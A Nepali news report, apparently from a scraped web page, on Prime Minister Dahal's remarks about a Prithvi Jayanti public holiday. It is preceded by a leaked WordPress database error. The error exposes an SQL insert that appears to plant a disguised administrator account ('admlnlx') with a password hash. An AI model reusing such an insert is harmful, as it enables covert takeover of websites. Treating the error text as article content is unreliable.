WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6yyknxrjNXh1slDgsEgPz2qmdXRkV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:04:04', '', 'admlnlx', 'admlnlx')
चितवन, पुस २६–
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले पृथ्वी जयन्तीमा सार्वजनिक विदा दिने विषय राजनीतिक तहमा छलफल गरेर मात्र निर्णय हुने बताउनुभएको छ । भरतपुर उपमहानगरपालिकाको आज तेस्रो नगरपरिषद्को समुद्घाटन गर्दै प्रधानमन्त्री दाहालले राष्ट्र निर्माणमा पृथ्वी नारायणा शाहको योगदानको उच्च कदर गर्दै सार्वजनिक विदाको विषय अहिले बहसको विषय बनेको बताउनुभयो ।
प्रधानमन्त्री दाहालले तत्कालिन समयमा पृथ्वी नारायण शाहको शालिक ढाल्दा आफूले बिरोध गरेको भन्दै इतिहासमा उनले पुर्याएको योगदानलाई भुल्न नसकिने बताउनुभयो । नगरपरिषदमा चितवन क्षेत्र न ४ का सांसद रामकृष्ण घिमिरे र राप्रपा चितवनका निर्देशन समितिका अध्यक्ष वद्री तिमिल्सीनाले पृथ्वी जयन्तीमा सार्वजनिक विदा दिन माग गरेपछि प्रचण्डले जवाफ दिनृभएको हो ।